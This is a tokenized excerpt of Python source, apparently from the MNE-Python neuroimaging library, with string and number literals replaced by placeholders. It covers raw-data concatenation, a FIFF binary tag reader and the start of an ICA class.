raws ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> first , last = zip ( * [ ( r . first_samp , r . last_samp ) for r in raws ] ) <EOL> events = concatenate_events ( events_list , first , last ) <EOL> raws [ <NUM_LIT:0> ] . append ( raws [ <NUM_LIT:1> : ] , preload ) <EOL> if events_list is None : <EOL> return raws [ <NUM_LIT:0> ] <EOL> else : <EOL> return raws [ <NUM_LIT:0> ] , events <EOL> def _check_update_montage ( info , montage , path = None , update_ch_names = False ) : <EOL> """<STR_LIT>""" <EOL> if montage is not None : <EOL> if not isinstance ( montage , ( string_types , Montage ) ) : <EOL> err = ( "<STR_LIT>" <EOL> "<STR_LIT>" % type ( montage ) ) <EOL> raise TypeError ( err ) <EOL> if montage is not None : <EOL> if isinstance ( montage , string_types ) : <EOL> montage = read_montage ( montage , path = path ) <EOL> _set_montage ( info , montage , update_ch_names = update_ch_names ) <EOL> missing_positions = [ ] <EOL> exclude = ( FIFF . FIFFV_EOG_CH , FIFF . FIFFV_MISC_CH , <EOL> FIFF . FIFFV_STIM_CH ) <EOL> for ch in info [ '<STR_LIT>' ] : <EOL> if not ch [ '<STR_LIT>' ] in exclude : <EOL> if np . unique ( ch [ '<STR_LIT>' ] ) . size == <NUM_LIT:1> : <EOL> missing_positions . append ( ch [ '<STR_LIT>' ] ) <EOL> if missing_positions : <EOL> raise KeyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % str ( missing_positions ) ) </s>
<s> import gzip <EOL> import os <EOL> import struct <EOL> import numpy as np <EOL> from . constants import FIFF <EOL> from . . fixes import partial <EOL> from . . externals . six import text_type <EOL> from . . externals . jdcal import jd2jcal <EOL> class Tag ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , kind , type_ , size , next , pos = None ) : <EOL> self . kind = int ( kind ) <EOL> self . type = int ( type_ ) <EOL> self . size = int ( size ) <EOL> self . next = int ( next ) <EOL> self . pos = pos if pos is not None else next <EOL> self . pos = int ( self . pos ) <EOL> self . data = None <EOL> def __repr__ ( self ) : <EOL> out = ( "<STR_LIT>" <EOL> % ( self . kind , self . type , self . size , self . next , self . pos ) ) <EOL> if hasattr ( self , '<STR_LIT:data>' ) : <EOL> out += "<STR_LIT>" % self . data <EOL> out += "<STR_LIT:\n>" <EOL> return out <EOL> def __cmp__ ( self , tag ) : <EOL> return int ( self . kind == tag . kind and <EOL> self . type == tag . type and <EOL> self . size == tag . size and <EOL> self . next == tag . next and <EOL> self . pos == tag . pos and <EOL> self . data == tag . data ) <EOL> def read_big ( fid , size = None ) : <EOL> """<STR_LIT>""" <EOL> buf_size = <NUM_LIT> <EOL> if size is None : <EOL> if not isinstance ( fid , gzip . GzipFile ) : <EOL> size = os . fstat ( fid . fileno ( ) ) . st_size - fid . tell ( ) <EOL> if size is not None : <EOL> segments = np . r_ [ np . arange ( <NUM_LIT:0> , size , buf_size ) , size ] <EOL> buf = bytearray ( b'<STR_LIT:U+0020>' * size ) <EOL> for start , end in zip ( segments [ : - <NUM_LIT:1> ] , segments [ <NUM_LIT:1> : ] ) : <EOL> data = fid . read ( int ( end - start ) ) <EOL> if len ( data ) != end - start : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> buf [ start : end ] = data <EOL> buf = bytes ( buf ) <EOL> else : <EOL> buf = [ b'<STR_LIT>' ] <EOL> new = fid . read ( buf_size ) <EOL> while len ( new ) > <NUM_LIT:0> : <EOL> buf . append ( new ) <EOL> new = fid . read ( buf_size ) <EOL> buf = b'<STR_LIT>' . join ( buf ) <EOL> return buf <EOL> def read_tag_info ( fid ) : <EOL> """<STR_LIT>""" <EOL> tag = _read_tag_header ( fid ) <EOL> if tag is None : <EOL> return None <EOL> if tag . next == <NUM_LIT:0> : <EOL> fid . seek ( tag . size , <NUM_LIT:1> ) <EOL> elif tag . next > <NUM_LIT:0> : <EOL> fid . seek ( tag . next , <NUM_LIT:0> ) <EOL> return tag <EOL> def _fromstring_rows ( fid , tag_size , dtype = None , shape = None , rlims = None ) : <EOL> """<STR_LIT>""" <EOL> if shape is not None : <EOL> item_size = np . dtype ( dtype ) . itemsize <EOL> if not len ( shape ) == <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> want_shape = np . prod ( shape ) <EOL> have_shape = tag_size // item_size <EOL> if want_shape != have_shape : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( want_shape , have_shape ) ) <EOL> if not len ( rlims ) == <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> n_row_out = rlims [ <NUM_LIT:1> ] - rlims [ <NUM_LIT:0> ] <EOL> if n_row_out <= <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> row_size = item_size * shape [ <NUM_LIT:1> ] <EOL> start_skip = int ( rlims [ <NUM_LIT:0> ] * row_size ) <EOL> read_size = int ( n_row_out * row_size ) <EOL> end_pos = int ( fid . tell ( ) + tag_size ) <EOL> fid . seek ( start_skip , <NUM_LIT:1> ) <EOL> out = np . fromstring ( fid . read ( read_size ) , dtype = dtype ) <EOL> fid . seek ( end_pos ) <EOL> else : <EOL> out = np . fromstring ( fid . read ( tag_size ) , dtype = dtype ) <EOL> return out <EOL> def _loc_to_coil_trans ( loc ) : <EOL> """<STR_LIT>""" <EOL> loc = loc . astype ( np . float64 ) <EOL> coil_trans = np . concatenate ( [ loc . reshape ( <NUM_LIT:4> , <NUM_LIT:3> ) . T [ : , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> ] ] , <EOL> np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) . reshape ( <NUM_LIT:1> , <NUM_LIT:4> ) ] ) <EOL> return coil_trans <EOL> def _coil_trans_to_loc ( coil_trans ) : <EOL> """<STR_LIT>""" <EOL> coil_trans = coil_trans . astype ( np . float64 ) <EOL> return np . roll ( coil_trans . T [ : , : <NUM_LIT:3> ] , <NUM_LIT:1> , <NUM_LIT:0> ) . flatten ( ) <EOL> def _loc_to_eeg_loc ( loc ) : <EOL> """<STR_LIT>""" <EOL> if loc [ <NUM_LIT:3> : <NUM_LIT:6> ] . any ( ) : <EOL> return np . array ( [ loc [ <NUM_LIT:0> : <NUM_LIT:3> ] , loc [ <NUM_LIT:3> : <NUM_LIT:6> ] ] ) . T <EOL> else : <EOL> return loc [ <NUM_LIT:0> : <NUM_LIT:3> ] [ : , np . newaxis ] . copy ( ) <EOL> _is_matrix = <NUM_LIT> <EOL> _matrix_coding_dense = <NUM_LIT> <EOL> _matrix_coding_CCS = <NUM_LIT> <EOL> _matrix_coding_RCS = <NUM_LIT> <EOL> _data_type = <NUM_LIT> <EOL> def _read_tag_header ( fid ) : <EOL> """<STR_LIT>""" <EOL> s = fid . read ( <NUM_LIT:4> * <NUM_LIT:4> ) <EOL> if len ( s ) == <NUM_LIT:0> : <EOL> return None <EOL> return Tag ( * struct . unpack ( '<STR_LIT>' , s ) ) <EOL> def _read_matrix ( fid , tag , shape , rlims , matrix_coding ) : <EOL> """<STR_LIT>""" <EOL> matrix_coding = matrix_coding >> <NUM_LIT:16> <EOL> if shape is not None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if matrix_coding == _matrix_coding_dense : <EOL> pos = fid . tell ( ) <EOL> fid . seek ( tag . size - <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> ndim = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = '<STR_LIT>' ) ) <EOL> fid . seek ( - ( ndim + <NUM_LIT:1> ) * <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> dims = np . fromstring ( fid . read ( <NUM_LIT:4> * ndim ) , dtype = '<STR_LIT>' ) [ : : - <NUM_LIT:1> ] <EOL> fid . seek ( pos , <NUM_LIT:0> ) <EOL> if ndim > <NUM_LIT:3> : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> matrix_type = _data_type & tag . type <EOL> if matrix_type == FIFF . FIFFT_INT : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_JULIAN : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_FLOAT : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_DOUBLE : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:8> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_COMPLEX_FLOAT : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * <NUM_LIT:2> * dims . prod ( ) ) , <EOL> dtype = '<STR_LIT>' ) <EOL> data = ( data [ : : <NUM_LIT:2> ] + <NUM_LIT> * data [ <NUM_LIT:1> : : <NUM_LIT:2> ] ) <EOL> elif matrix_type == FIFF . FIFFT_COMPLEX_DOUBLE : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:8> * <NUM_LIT:2> * dims . prod ( ) ) , <EOL> dtype = '<STR_LIT>' ) <EOL> data = ( data [ : : <NUM_LIT:2> ] + <NUM_LIT> * data [ <NUM_LIT:1> : : <NUM_LIT:2> ] ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' <EOL> % matrix_type ) <EOL> data . shape = dims <EOL> elif matrix_coding in ( _matrix_coding_CCS , _matrix_coding_RCS ) : <EOL> from scipy import sparse <EOL> pos = fid . tell ( ) <EOL> fid . seek ( tag . size - <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> ndim = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = '<STR_LIT>' ) ) <EOL> fid . seek ( - ( ndim + <NUM_LIT:2> ) * <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> dims = np . fromstring ( fid . read ( <NUM_LIT:4> * ( ndim + <NUM_LIT:1> ) ) , dtype = '<STR_LIT>' ) <EOL> if ndim != <NUM_LIT:2> : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fid . seek ( pos , <NUM_LIT:0> ) <EOL> nnz = int ( dims [ <NUM_LIT:0> ] ) <EOL> nrow = int ( dims [ <NUM_LIT:1> ] ) <EOL> ncol = int ( dims [ <NUM_LIT:2> ] ) <EOL> sparse_data = np . fromstring ( fid . read ( <NUM_LIT:4> * nnz ) , dtype = '<STR_LIT>' ) <EOL> shape = ( dims [ <NUM_LIT:1> ] , dims [ <NUM_LIT:2> ] ) <EOL> if matrix_coding == _matrix_coding_CCS : <EOL> tmp_indices = fid . read ( <NUM_LIT:4> * nnz ) <EOL> sparse_indices = np . fromstring ( tmp_indices , dtype = '<STR_LIT>' ) <EOL> tmp_ptrs = fid . read ( <NUM_LIT:4> * ( ncol + <NUM_LIT:1> ) ) <EOL> sparse_ptrs = np . fromstring ( tmp_ptrs , dtype = '<STR_LIT>' ) <EOL> if ( sparse_ptrs [ - <NUM_LIT:1> ] > len ( sparse_indices ) or <EOL> np . any ( sparse_ptrs < <NUM_LIT:0> ) ) : <EOL> sparse_indices = np . concatenate ( <EOL> ( np . fromstring ( tmp_indices [ : <NUM_LIT:4> * ( nrow + <NUM_LIT:1> ) ] , dtype = '<STR_LIT>' ) , <EOL> np . fromstring ( tmp_indices [ <NUM_LIT:4> * ( nrow + <NUM_LIT:1> ) : ] , dtype = '<STR_LIT>' ) ) ) <EOL> sparse_ptrs = np . fromstring ( tmp_ptrs , dtype = '<STR_LIT>' ) <EOL> data = sparse . csc_matrix ( ( sparse_data , sparse_indices , <EOL> sparse_ptrs ) , shape = shape ) <EOL> else : <EOL> sparse_indices = np . fromstring ( fid . read ( <NUM_LIT:4> * nnz ) , dtype = '<STR_LIT>' ) <EOL> sparse_ptrs = np . fromstring ( fid . read ( <NUM_LIT:4> * ( nrow + <NUM_LIT:1> ) ) , dtype = '<STR_LIT>' ) <EOL> data = sparse . csr_matrix ( ( sparse_data , sparse_indices , <EOL> sparse_ptrs ) , shape = shape ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return data <EOL> def _read_simple ( fid , tag , shape , rlims , dtype ) : <EOL> """<STR_LIT>""" <EOL> return _fromstring_rows ( fid , tag . size , dtype = dtype , shape = shape , <EOL> rlims = rlims ) <EOL> def _read_string ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> d = _fromstring_rows ( fid , tag . size , dtype = '<STR_LIT>' , shape = shape , rlims = rlims ) <EOL> return text_type ( d . tostring ( ) . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> def _read_complex_float ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> if shape is not None : <EOL> shape = ( shape [ <NUM_LIT:0> ] , shape [ <NUM_LIT:1> ] * <NUM_LIT:2> ) <EOL> d = _fromstring_rows ( fid , tag . size , dtype = "<STR_LIT>" , shape = shape , rlims = rlims ) <EOL> d = d [ : : <NUM_LIT:2> ] + <NUM_LIT> * d [ <NUM_LIT:1> : : <NUM_LIT:2> ] <EOL> return d <EOL> def _read_complex_double ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> if shape is not None : <EOL> shape = ( shape [ <NUM_LIT:0> ] , shape [ <NUM_LIT:1> ] * <NUM_LIT:2> ) <EOL> d = _fromstring_rows ( fid , tag . size , dtype = "<STR_LIT>" , shape = shape , rlims = rlims ) <EOL> d = d [ : : <NUM_LIT:2> ] + <NUM_LIT> * d [ <NUM_LIT:1> : : <NUM_LIT:2> ] <EOL> return d <EOL> def _read_id_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return dict ( <EOL> version = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> machid = np . fromstring ( fid . read ( <NUM_LIT:8> ) , dtype = "<STR_LIT>" ) , <EOL> secs = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> usecs = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) ) <EOL> def _read_dig_point_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return dict ( <EOL> kind = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> ident = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> r = np . fromstring ( fid . read ( <NUM_LIT:12> ) , dtype = "<STR_LIT>" ) , <EOL> coord_frame = FIFF . FIFFV_COORD_UNKNOWN ) <EOL> def _read_coord_trans_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> from . . transforms import Transform <EOL> fro = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> to = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> rot = np . fromstring ( fid . read ( <NUM_LIT> ) , dtype = "<STR_LIT>" ) . reshape ( <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> move = np . fromstring ( fid . read ( <NUM_LIT:12> ) , dtype = "<STR_LIT>" ) <EOL> trans = np . r_ [ np . c_ [ rot , move ] , <EOL> np . array ( [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) . T ] <EOL> data = Transform ( fro , to , trans ) <EOL> fid . seek ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> return data <EOL> _coord_dict = { <EOL> FIFF . FIFFV_MEG_CH : FIFF . FIFFV_COORD_DEVICE , <EOL> FIFF . FIFFV_REF_MEG_CH : FIFF . FIFFV_COORD_DEVICE , <EOL> FIFF . FIFFV_EEG_CH : FIFF . FIFFV_COORD_HEAD , <EOL> } <EOL> def _read_ch_info_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> d = dict ( <EOL> scanno = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> logno = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> kind = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> range = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> cal = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> coil_type = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> loc = np . fromstring ( fid . read ( <NUM_LIT> ) , dtype = "<STR_LIT>" ) . astype ( np . float64 ) , <EOL> unit = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> unit_mul = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> ) <EOL> ch_name = np . fromstring ( fid . read ( <NUM_LIT:16> ) , dtype = "<STR_LIT>" ) <EOL> ch_name = ch_name [ : np . argmax ( ch_name == b'<STR_LIT>' ) ] . tostring ( ) <EOL> d [ '<STR_LIT>' ] = ch_name . decode ( ) <EOL> d [ '<STR_LIT>' ] = _coord_dict . get ( d [ '<STR_LIT>' ] , FIFF . FIFFV_COORD_UNKNOWN ) <EOL> return d <EOL> def _read_old_pack ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> offset = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> scale = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> data = np . fromstring ( fid . read ( tag . size - <NUM_LIT:8> ) , dtype = "<STR_LIT>" ) <EOL> data = data * scale <EOL> data += offset <EOL> return data <EOL> def _read_dir_entry_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return [ _read_tag_header ( fid ) for _ in range ( tag . size // <NUM_LIT:16> - <NUM_LIT:1> ) ] <EOL> def _read_julian ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return jd2jcal ( int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) ) <EOL> _call_dict = { <EOL> FIFF . FIFFT_STRING : _read_string , <EOL> FIFF . FIFFT_COMPLEX_FLOAT : _read_complex_float , <EOL> FIFF . FIFFT_COMPLEX_DOUBLE : _read_complex_double , <EOL> FIFF . FIFFT_ID_STRUCT : _read_id_struct , <EOL> FIFF . FIFFT_DIG_POINT_STRUCT : _read_dig_point_struct , <EOL> FIFF . FIFFT_COORD_TRANS_STRUCT : _read_coord_trans_struct , <EOL> FIFF . FIFFT_CH_INFO_STRUCT : _read_ch_info_struct , <EOL> FIFF . FIFFT_OLD_PACK : _read_old_pack , <EOL> FIFF . FIFFT_DIR_ENTRY_STRUCT : _read_dir_entry_struct , <EOL> FIFF . FIFFT_JULIAN : _read_julian , <EOL> } <EOL> _simple_dict = { <EOL> FIFF . FIFFT_BYTE : '<STR_LIT>' , <EOL> FIFF . FIFFT_SHORT : '<STR_LIT>' , <EOL> FIFF . FIFFT_INT : '<STR_LIT>' , <EOL> FIFF . FIFFT_USHORT : '<STR_LIT>' , <EOL> FIFF . FIFFT_UINT : '<STR_LIT>' , <EOL> FIFF . FIFFT_FLOAT : '<STR_LIT>' , <EOL> FIFF . FIFFT_DOUBLE : '<STR_LIT>' , <EOL> FIFF . FIFFT_DAU_PACK16 : '<STR_LIT>' , <EOL> } <EOL> for key , dtype in _simple_dict . items ( ) : <EOL> _call_dict [ key ] = partial ( _read_simple , dtype = dtype ) <EOL> def read_tag ( fid , pos = None , shape = None , rlims = None ) : <EOL> """<STR_LIT>""" <EOL> if pos is not None : <EOL> fid . seek ( pos , <NUM_LIT:0> ) <EOL> tag = _read_tag_header ( fid ) <EOL> if tag . size > <NUM_LIT:0> : <EOL> matrix_coding = _is_matrix & tag . type <EOL> if matrix_coding != <NUM_LIT:0> : <EOL> tag . data = _read_matrix ( fid , tag , shape , rlims , matrix_coding ) <EOL> else : <EOL> fun = _call_dict . get ( tag . type ) <EOL> if fun is not None : <EOL> tag . data = fun ( fid , tag , shape , rlims ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % tag . type ) <EOL> if tag . next != FIFF . FIFFV_NEXT_SEQ : <EOL> fid . seek ( tag . next , <NUM_LIT:1> ) <EOL> return tag <EOL> def find_tag ( fid , node , findkind ) : <EOL> """<STR_LIT>""" <EOL> if node [ '<STR_LIT>' ] is not None : <EOL> for subnode in node [ '<STR_LIT>' ] : <EOL> if subnode . kind == findkind : <EOL> return read_tag ( fid , subnode . pos ) <EOL> return None <EOL> def has_tag ( node , kind ) : <EOL> """<STR_LIT>""" <EOL> for d in node [ '<STR_LIT>' ] : <EOL> if d . kind == kind : <EOL> return True <EOL> return False </s>
<s> from inspect import isfunction <EOL> from collections import namedtuple <EOL> from copy import deepcopy <EOL> import os <EOL> import json <EOL> import numpy as np <EOL> from scipy import linalg <EOL> from . ecg import ( qrs_detector , _get_ecg_channel_index , _make_ecg , <EOL> create_ecg_epochs ) <EOL> from . eog import _find_eog_events , _get_eog_channel_index <EOL> from . infomax_ import infomax <EOL> from . . cov import compute_whitener <EOL> from . . import Covariance , Evoked <EOL> from . . io . pick import ( pick_types , pick_channels , pick_info , <EOL> _pick_data_channels , _DATA_CH_TYPES_SPLIT ) <EOL> from . . io . write import ( write_double_matrix , write_string , <EOL> write_name_list , write_int , start_block , <EOL> end_block ) <EOL> from . . io . tree import dir_tree_find <EOL> from . . io . open import fiff_open <EOL> from . . io . tag import read_tag <EOL> from . . io . meas_info import write_meas_info , read_meas_info <EOL> from . . io . constants import Bunch , FIFF <EOL> from . . io . base import _BaseRaw <EOL> from . . epochs import _BaseEpochs <EOL> from . . viz import ( plot_ica_components , plot_ica_scores , <EOL> plot_ica_sources , plot_ica_overlay ) <EOL> from . . viz . utils import ( _prepare_trellis , tight_layout , plt_show , <EOL> _setup_vmin_vmax ) <EOL> from . . viz . topomap import ( _prepare_topo_plot , _check_outlines , <EOL> plot_topomap , _hide_frame ) <EOL> from . . channels . channels import _contains_ch_type , ContainsMixin <EOL> from . . io . write import start_file , end_file , write_id <EOL> from . . utils import ( check_version , logger , check_fname , verbose , <EOL> _reject_data_segments , check_random_state , <EOL> _get_fast_dot , compute_corr , _check_copy_dep ) <EOL> from . . fixes import _get_args <EOL> from . . filter import band_pass_filter <EOL> from . bads import find_outliers <EOL> from . ctps_ import ctps <EOL> from . . externals . six import string_types , text_type <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _make_xy_sfunc ( func , ndim_output = False ) : <EOL> """<STR_LIT>""" <EOL> if ndim_output : <EOL> def sfunc ( x , y ) : <EOL> return np . array ( [ func ( a , y . ravel ( ) ) for a in x ] ) [ : , <NUM_LIT:0> ] <EOL> else : <EOL> def sfunc ( x , y ) : <EOL> return np . array ( [ func ( a , y . ravel ( ) ) for a in x ] ) <EOL> sfunc . __name__ = '<STR_LIT:.>' . join ( [ '<STR_LIT>' , func . __module__ , func . __name__ ] ) <EOL> sfunc . __doc__ = func . __doc__ <EOL> return sfunc <EOL> def get_score_funcs ( ) : <EOL> """<STR_LIT>""" <EOL> from scipy import stats <EOL> from scipy . spatial import distance <EOL> score_funcs = Bunch ( ) <EOL> xy_arg_dist_funcs = [ ( n , f ) for n , f in vars ( distance ) . items ( ) <EOL> if isfunction ( f ) and not n . startswith ( '<STR_LIT:_>' ) ] <EOL> xy_arg_stats_funcs = [ ( n , f ) for n , f in vars ( stats ) . items ( ) <EOL> if isfunction ( f ) and not n . startswith ( '<STR_LIT:_>' ) ] <EOL> score_funcs . update ( dict ( ( n , _make_xy_sfunc ( f ) ) <EOL> for n , f in xy_arg_dist_funcs <EOL> if _get_args ( f ) == [ '<STR_LIT:u>' , '<STR_LIT:v>' ] ) ) <EOL> score_funcs . update ( dict ( ( n , _make_xy_sfunc ( f , ndim_output = True ) ) <EOL> for n , f in xy_arg_stats_funcs <EOL> if _get_args ( f ) == [ '<STR_LIT:x>' , '<STR_LIT:y>' ] ) ) <EOL> return score_funcs <EOL> class ICA ( ContainsMixin ) : <EOL> """<STR_LIT>""" <EOL> @ verbose <EOL> def __init__ ( self , n_components = None , max_pca_components = None , <EOL> n_pca_components = None , noise_cov = None , random_state = None , <EOL> method = '<STR_LIT>' , fit_params = None , max_iter = <NUM_LIT:200> , <EOL> verbose = None ) : <EOL> methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if method not in methods : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( '<STR_LIT>' . join ( methods ) , method ) ) <EOL> if not check_version ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . noise_cov = noise_cov <EOL> if max_pca_components is not None and n_components > max_pca_components : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if isinstance ( n_components , float ) and not <NUM_LIT:0> < n_components <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . current_fit = '<STR_LIT>' <EOL> self . verbose = verbose <EOL> self . n_components = n_components <EOL> self . max_pca_components = max_pca_components <EOL> self . n_pca_components = n_pca_components <EOL> self . ch_names = None <EOL> self . random_state = random_state <EOL> if fit_params is None : <EOL> fit_params = { } <EOL> fit_params = deepcopy ( fit_params ) <EOL> if "<STR_LIT>" in fit_params : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if method == '<STR_LIT>' : <EOL> update = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } <EOL> fit_params . update ( dict ( ( k , v ) for k , v in update . items ( ) if k <EOL> not in fit_params ) ) <EOL> elif method == '<STR_LIT>' : <EOL> fit_params . update ( { '<STR_LIT>' : False } ) <EOL> elif method == '<STR_LIT>' : <EOL> fit_params . update ( { '<STR_LIT>' : True } ) <EOL> if '<STR_LIT>' not in fit_params : <EOL> fit_params [ '<STR_LIT>' ] = max_iter <EOL> self . max_iter = max_iter <EOL> self . fit_params = fit_params <EOL> self . exclude = [ ] <EOL> self . info = None <EOL> self . method = method <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit == '<STR_LIT>' : <EOL> s = '<STR_LIT>' <EOL> elif self . current_fit == '<STR_LIT>' : <EOL> s = '<STR_LIT>' <EOL> else : <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' % ( self . method , <EOL> str ( getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> s += ( '<STR_LIT>' % str ( self . n_components_ ) if <EOL> hasattr ( self , '<STR_LIT>' ) else <EOL> '<STR_LIT>' ) <EOL> if self . info is not None : <EOL> ch_fit = [ '<STR_LIT>' % c for c in _DATA_CH_TYPES_SPLIT if c in self ] <EOL> s += '<STR_LIT>' . format ( '<STR_LIT>' . join ( ch_fit ) ) <EOL> if self . exclude : <EOL> s += '<STR_LIT>' % len ( self . exclude ) <EOL> return '<STR_LIT>' % s <EOL> @ verbose <EOL> def fit ( self , inst , picks = None , start = None , stop = None , decim = None , <EOL> reject = None , flat = None , tstep = <NUM_LIT> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> self . _fit_raw ( inst , picks , start , stop , decim , reject , flat , <EOL> tstep , verbose ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> self . _fit_epochs ( inst , picks , decim , verbose ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return self <EOL> def _reset ( self ) : <EOL> """<STR_LIT>""" <EOL> del self . _pre_whitener <EOL> del self . unmixing_matrix_ <EOL> del self . mixing_matrix_ <EOL> del self . n_components_ <EOL> del self . n_samples_ <EOL> del self . pca_components_ <EOL> del self . pca_explained_variance_ <EOL> del self . pca_mean_ <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> del self . drop_inds_ <EOL> def _fit_raw ( self , raw , picks , start , stop , decim , reject , flat , tstep , <EOL> verbose ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit != '<STR_LIT>' : <EOL> self . _reset ( ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( raw . info , exclude = '<STR_LIT>' , <EOL> with_ref_meg = False ) <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' % len ( picks ) ) <EOL> if self . max_pca_components is None : <EOL> self . max_pca_components = len ( picks ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . info = pick_info ( raw . info , picks ) <EOL> if self . info [ '<STR_LIT>' ] : <EOL> self . info [ '<STR_LIT>' ] = [ ] <EOL> self . ch_names = self . info [ '<STR_LIT>' ] <EOL> start , stop = _check_start_stop ( 